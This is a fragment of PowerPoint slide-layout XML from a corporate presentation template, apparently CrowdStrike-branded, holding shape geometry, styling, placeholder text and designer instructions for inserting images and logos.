            <a:chExt cx="113118" cy="8122920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5400000">
              <a:off x="-1146811" y="4191002"/>
              <a:ext cx="812292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iangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2774256" y="568009"/>
              <a:ext cx="174650" cy="1131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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5429249" y="324961"/>
            <a:ext cx="3279091" cy="57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 baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEMPLATE ASSETS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730240" y="4571866"/>
            <a:ext cx="2474703" cy="5868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accent6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Corner logo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
                <a:ea typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
                <a:cs typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
              </a:rPr>
              <a:t>Copy and paste this graphic onto any slide where the logo  is covered by an image.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
              <a:ea typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
              <a:cs typeface="ITC Avant Garde Gothic Pro Book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 rot="10800000">
            <a:off x="8252882" y="4610100"/>
            <a:ext cx="113118" cy="486062"/>
            <a:chOff x="2805022" y="414880"/>
            <a:chExt cx="113118" cy="486062"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Straight Connector 24"/>
            <p:cNvCxnSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="2914650" y="414880"/>
              <a:ext cx="0" cy="48606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iangle 25"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2774256" y="568009"/>
              <a:ext cx="174650" cy="1131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8427720" y="4610100"/>
            <a:ext cx="594360" cy="486062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472440" y="2024712"/>
            <a:ext cx="8122920" cy="2194560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0" y="57150"/>
            <a:ext cx="1444007" cy="389318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7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-101" y="0"/>
            <a:ext cx="4356077" cy="5143500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02" y="0"/>
            <a:ext cx="4356077" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:alpha val="44000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="80000">
                <a:schemeClr val="tx1">
                  <a:alpha val="84000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="468000" tIns="503999" rIns="288000" bIns="1728000" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="2800" b="0" i="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:ea typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:cs typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Click to add key message.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80" y="3795886"/>
            <a:ext cx="3759665" cy="576064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Wingdings" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0" cap="none" baseline="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additional information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860031" y="731175"/>
            <a:ext cx="1514819" cy="19389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860031" y="4654211"/>
            <a:ext cx="1514819" cy="19389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859338" y="900113"/>
            <a:ext cx="3667574" cy="3616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72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617088" y="1314868"/>
            <a:ext cx="7909375" cy="2989856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0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34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023488" y="275497"/>
            <a:ext cx="7909824" cy="5768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617089" y="1314868"/>
            <a:ext cx="3798302" cy="298985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26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4728611" y="1308486"/>
            <a:ext cx="3798302" cy="298985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9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526912" y="4719757"/>
            <a:ext cx="388492" cy="3040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8400" y="4767264"/>
            <a:ext cx="3548512" cy="273844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr lang="en-US"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08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97" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1499"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685595" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1349"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1028392" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1371188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2019 CROWDSTRIKE,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1597-11DE-2D47-B206-5D7EB1749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4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061608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1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4228" t="8555" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1816170"/>
            <a:ext cx="2988129" cy="2829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27434" y="685152"/>
            <a:ext cx="389267" cy="389267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22217" y="685152"/>
            <a:ext cx="4107383" cy="389267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27434" y="1329503"/>
            <a:ext cx="389267" cy="389267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122217" y="1329503"/>
            <a:ext cx="4107383" cy="389267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627434" y="1973854"/>
            <a:ext cx="389267" cy="389267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122217" y="1973854"/>
            <a:ext cx="4107383" cy="389267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27434" y="2618205"/>
            <a:ext cx="389267" cy="389267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22217" y="2618205"/>
            <a:ext cx="4107383" cy="389267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3627434" y="3262556"/>
            <a:ext cx="389267" cy="389267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122217" y="3262556"/>
            <a:ext cx="4107383" cy="389267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627434" y="3906908"/>
            <a:ext cx="389267" cy="389267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122217" y="3906908"/>
            <a:ext cx="4107383" cy="389267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42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617088" y="1314868"/>
            <a:ext cx="7909375" cy="298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en-U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2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Phrase, Photo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9144000" cy="228441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2019 CROWDSTRIKE, INC.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2284411"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="73000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="251999" rIns="90000" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2600" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Pro XLt"/>
                <a:cs typeface="ITC Avant Garde Pro XLt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Click to add key topic phrase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11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088" y="1312223"/>
            <a:ext cx="7909375" cy="2993079"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2" spcCol="288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en-U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hras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795" cy="3794954"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9144101"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3810066"/>
              <a:gd name="connsiteX1" fmla="*/ 9144101 w 9144101"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 3810066"/>
              <a:gd name="connsiteX2" fmla="*/ 9144101 w 9144101"/>
              <a:gd name="connsiteY2" fmla="*/ 3215062 h 3810066"/>
              <a:gd name="connsiteX3" fmla="*/ 5167391 w 9144101"/>
              <a:gd name="connsiteY3" fmla="*/ 3215062 h 3810066"/>
              <a:gd name="connsiteX4" fmla="*/ 5155332 w 9144101"/>
              <a:gd name="connsiteY4" fmla="*/ 3334677 h 3810066"/>
              <a:gd name="connsiteX5" fmla="*/ 4572050 w 9144101"/>
              <a:gd name="connsiteY5" fmla="*/ 3810066 h 3810066"/>
              <a:gd name="connsiteX6" fmla="*/ 3988768 w 9144101"/>
              <a:gd name="connsiteY6" fmla="*/ 3334677 h 3810066"/>
              <a:gd name="connsiteX7" fmla="*/ 3976710 w 9144101"/>
              <a:gd name="connsiteY7" fmla="*/ 3215062 h 3810066"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 9144101"/>
              <a:gd name="connsiteY8" fmla="*/ 3215062 h 38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101" h="3810066">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144101" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144101" y="3215062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5167391" y="3215062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5155332" y="3334677"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5099815" y="3605981"/>
                  <a:pt x="4859766" y="3810066"/>
                  <a:pt x="4572050" y="3810066"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4284335" y="3810066"/>
                  <a:pt x="4044285" y="3605981"/>
                  <a:pt x="3988768" y="3334677"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3976710" y="3215062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="32150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-1" y="0"/>
            <a:ext cx="9143797" cy="3804045"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9143797"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3804045"/>
              <a:gd name="connsiteX1" fmla="*/ 9143797 w 9143797"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 3804045"/>
              <a:gd name="connsiteX2" fmla="*/ 9143797 w 9143797"/>
              <a:gd name="connsiteY2" fmla="*/ 3202310 h 3804045"/>
              <a:gd name="connsiteX3" fmla="*/ 5175094 w 9143797"/>
              <a:gd name="connsiteY3" fmla="*/ 3202310 h 3804045"/>
              <a:gd name="connsiteX4" fmla="*/ 5175251 w 9143797"/>
              <a:gd name="connsiteY4" fmla="*/ 3203867 h 3804045"/>
              <a:gd name="connsiteX5" fmla="*/ 4575073 w 9143797"/>
              <a:gd name="connsiteY5" fmla="*/ 3804045 h 3804045"/>
              <a:gd name="connsiteX6" fmla="*/ 3974895 w 9143797"/>
              <a:gd name="connsiteY6" fmla="*/ 3203867 h 3804045"/>
              <a:gd name="connsiteX7" fmla="*/ 3975052 w 9143797"/>
              <a:gd name="connsiteY7" fmla="*/ 3202310 h 3804045"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 9143797"/>
              <a:gd name="connsiteY8" fmla="*/ 3202310 h 3804045"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 9143797"/>
              <a:gd name="connsiteY9" fmla="*/ 2368345 h 3804045"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 9143797"/>
              <a:gd name="connsiteY10" fmla="*/ 2864 h 380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797" h="3804045">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9143797" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9143797" y="3202310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5175094" y="3202310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5175251" y="3203867"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5175251" y="3535336"/>
                  <a:pt x="4906542" y="3804045"/>
                  <a:pt x="4575073" y="3804045"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4243604" y="3804045"/>
                  <a:pt x="3974895" y="3535336"/>
                  <a:pt x="3974895" y="3203867"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3975052" y="3202310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3202310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2368345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2864"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="99000"/>
                  <a:alpha val="30000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="82000">
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:alpha val="70000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="12700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2600" b="0" i="0" cap="all">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:ea typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:cs typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2600" b="0" i="0" cap="all">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:ea typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:cs typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2600" b="0" i="0" cap="all">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:ea typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:cs typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2600" b="0" i="0" cap="all">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:ea typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:cs typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2600" b="0" i="0" cap="all">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:ea typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
                <a:cs typeface="ITC Avant Garde Gothic Pro Extra Light" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Click to add key topic phrase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5052" y="3204479"/>
            <a:ext cx="9138948" cy="1346967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C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4" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="4093880" y="2723560"/>
            <a:ext cx="956138" cy="956138"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1559398 w 2190612"/>
              <a:gd name="connsiteY0" fmla="*/ 668575 h 2190612"/>
              <a:gd name="connsiteX1" fmla="*/ 1559398 w 2190612"/>
              <a:gd name="connsiteY1" fmla="*/ 797528 h 2190612"/>
              <a:gd name="connsiteX2" fmla="*/ 953264 w 2190612"/>
              <a:gd name="connsiteY2" fmla="*/ 1403662 h 2190612"/>
              <a:gd name="connsiteX3" fmla="*/ 1336833 w 2190612"/>
              <a:gd name="connsiteY3" fmla="*/ 1403662 h 2190612"/>
              <a:gd name="connsiteX4" fmla="*/ 1428017 w 2190612"/>
              <a:gd name="connsiteY4" fmla="*/ 1494846 h 2190612"/>
              <a:gd name="connsiteX5" fmla="*/ 1336833 w 2190612"/>
              <a:gd name="connsiteY5" fmla="*/ 1586030 h 2190612"/>
              <a:gd name="connsiteX6" fmla="*/ 734437 w 2190612"/>
              <a:gd name="connsiteY6" fmla="*/ 1586030 h 2190612"/>
              <a:gd name="connsiteX7" fmla="*/ 669960 w 2190612"/>
              <a:gd name="connsiteY7" fmla="*/ 1559323 h 2190612"/>
              <a:gd name="connsiteX8" fmla="*/ 669865 w 2190612"/>
              <a:gd name="connsiteY8" fmla="*/ 1559181 h 2190612"/>
              <a:gd name="connsiteX9" fmla="*/ 669220 w 2190612"/>
              <a:gd name="connsiteY9" fmla="*/ 1558753 h 2190612"/>
              <a:gd name="connsiteX10" fmla="*/ 668733 w 2190612"/>
              <a:gd name="connsiteY10" fmla="*/ 1558020 h 2190612"/>
              <a:gd name="connsiteX11" fmla="*/ 668502 w 2190612"/>
              <a:gd name="connsiteY11" fmla="*/ 1557864 h 2190612"/>
              <a:gd name="connsiteX12" fmla="*/ 641795 w 2190612"/>
              <a:gd name="connsiteY12" fmla="*/ 1493387 h 2190612"/>
              <a:gd name="connsiteX13" fmla="*/ 641795 w 2190612"/>
              <a:gd name="connsiteY13" fmla="*/ 890992 h 2190612"/>
              <a:gd name="connsiteX14" fmla="*/ 732979 w 2190612"/>
              <a:gd name="connsiteY14" fmla="*/ 799808 h 2190612"/>
              <a:gd name="connsiteX15" fmla="*/ 797455 w 2190612"/>
              <a:gd name="connsiteY15" fmla="*/ 826515 h 2190612"/>
              <a:gd name="connsiteX16" fmla="*/ 824163 w 2190612"/>
              <a:gd name="connsiteY16" fmla="*/ 890992 h 2190612"/>
              <a:gd name="connsiteX17" fmla="*/ 824163 w 2190612"/>
              <a:gd name="connsiteY17" fmla="*/ 1274856 h 2190612"/>
              <a:gd name="connsiteX18" fmla="*/ 1430445 w 2190612"/>
              <a:gd name="connsiteY18" fmla="*/ 668575 h 2190612"/>
              <a:gd name="connsiteX19" fmla="*/ 1559398 w 2190612"/>
              <a:gd name="connsiteY19" fmla="*/ 668575 h 2190612"/>
              <a:gd name="connsiteX20" fmla="*/ 1769745 w 2190612"/>
              <a:gd name="connsiteY20" fmla="*/ 427491 h 2190612"/>
              <a:gd name="connsiteX21" fmla="*/ 429891 w 2190612"/>
              <a:gd name="connsiteY21" fmla="*/ 428327 h 2190612"/>
              <a:gd name="connsiteX22" fmla="*/ 429055 w 2190612"/>
              <a:gd name="connsiteY22" fmla="*/ 1768181 h 2190612"/>
              <a:gd name="connsiteX23" fmla="*/ 1768909 w 2190612"/>
              <a:gd name="connsiteY23" fmla="*/ 1767345 h 2190612"/>
              <a:gd name="connsiteX24" fmla="*/ 1769745 w 2190612"/>
              <a:gd name="connsiteY24" fmla="*/ 427491 h 2190612"/>
              <a:gd name="connsiteX25" fmla="*/ 1870288 w 2190612"/>
              <a:gd name="connsiteY25" fmla="*/ 320324 h 2190612"/>
              <a:gd name="connsiteX26" fmla="*/ 1869321 w 2190612"/>
              <a:gd name="connsiteY26" fmla="*/ 1869322 h 2190612"/>
              <a:gd name="connsiteX27" fmla="*/ 320324 w 2190612"/>
              <a:gd name="connsiteY27" fmla="*/ 1870288 h 2190612"/>
              <a:gd name="connsiteX28" fmla="*/ 321290 w 2190612"/>
              <a:gd name="connsiteY28" fmla="*/ 321291 h 2190612"/>
              <a:gd name="connsiteX29" fmla="*/ 1870288 w 2190612"/>
              <a:gd name="connsiteY29" fmla="*/ 320324 h 21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90612" h="2190612">
                <a:moveTo>
                  <a:pt x="1559398" y="668575"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1595007" y="704184"/>
                  <a:pt x="1595007" y="761919"/>
                  <a:pt x="1559398" y="797528"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="953264" y="1403662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1336833" y="1403662"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1387192" y="1403662"/>
                  <a:pt x="1428017" y="1444487"/>
                  <a:pt x="1428017" y="1494846"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1428016" y="1545206"/>
                  <a:pt x="1387192" y="1586030"/>
                  <a:pt x="1336833" y="1586030"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="734437" y="1586030"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="709258" y="1586030"/>
                  <a:pt x="686461" y="1575824"/>
                  <a:pt x="669960" y="1559323"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="669865" y="1559181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669220" y="1558753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668733" y="1558020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668502" y="1557864"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="652001" y="1541363"/>
                  <a:pt x="641795" y="1518567"/>
                  <a:pt x="641795" y="1493387"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="641795" y="890992"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="641795" y="840632"/>
                  <a:pt x="682619" y="799808"/>
                  <a:pt x="732979" y="799808"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="758159" y="799808"/>
                  <a:pt x="780955" y="810014"/>
                  <a:pt x="797455" y="826515"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="813957" y="843016"/>
                  <a:pt x="824163" y="865812"/>
                  <a:pt x="824163" y="890992"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="824163" y="1274856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1430445" y="668575"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1466054" y="632965"/>
                  <a:pt x="1523788" y="632965"/>
                  <a:pt x="1559398" y="668575"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1769745" y="427491"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1399985" y="57732"/>
                  <a:pt x="800112" y="58106"/>
                  <a:pt x="429891" y="428327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59670" y="798548"/>
                  <a:pt x="59296" y="1398421"/>
                  <a:pt x="429055" y="1768181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="798815" y="2137940"/>
                  <a:pt x="1398688" y="2137566"/>
                  <a:pt x="1768909" y="1767345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2139130" y="1397124"/>
                  <a:pt x="2139504" y="797251"/>
                  <a:pt x="1769745" y="427491"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1870288" y="320324"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2297765" y="747801"/>
                  <a:pt x="2297332" y="1441311"/>
                  <a:pt x="1869321" y="1869322"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1441310" y="2297332"/>
                  <a:pt x="747801" y="2297765"/>
                  <a:pt x="320324" y="1870288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-107153" y="1442811"/>
                  <a:pt x="-106720" y="749302"/>
                  <a:pt x="321290" y="321291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="749301" y="-106720"/>
                  <a:pt x="1442811" y="-107153"/>
                  <a:pt x="1870288" y="32032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1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453245" y="3899899"/>
            <a:ext cx="6237512" cy="651125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sentence or two about the topic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>
        <p:tmplLst>
          <p:tmpl>
            <p:tnLst>
              <p:par>
                <p:cTn presetID="22" presetClass="exit" presetSubtype="1" fill="hold" nodeType="withEffect">
                  <p:stCondLst>
                    <p:cond delay="0"/>
                  </p:stCondLst>
                  <p:childTnLst>
                    <p:animEffect transition="out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hrase, Photo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2623671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"/>
            <a:ext cx="9144000" cy="2623673"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="73000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="251999" rIns="90000" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2600" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Pro XLt"/>
                <a:cs typeface="ITC Avant Garde Pro XLt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Click to add key topic phrase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21556" y="3826420"/>
            <a:ext cx="2253620" cy="651125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short sentence about the topic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34606" y="3826420"/>
            <a:ext cx="2253620" cy="651125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short sentence about the topic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47657" y="3826420"/>
            <a:ext cx="2253620" cy="651125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short sentence about the topic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309100" y="209550"/>
            <a:ext cx="1771650" cy="2990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650" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instructions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="650" i="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are not visible during Show Mode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="650" i="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="650" i="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To insert header image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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Drag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the image from your source folder into the dark grey header area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</a:rPr>
              <a:t>If the image overlaps/hides the text, right click on the image and select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Arrange &gt; Send to Back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="88900" indent="-88900" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" b="1" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="464B54"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To add the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Crowdstrike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tag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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copy and paste from previous slides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464B54"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as the last step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</a:rPr>
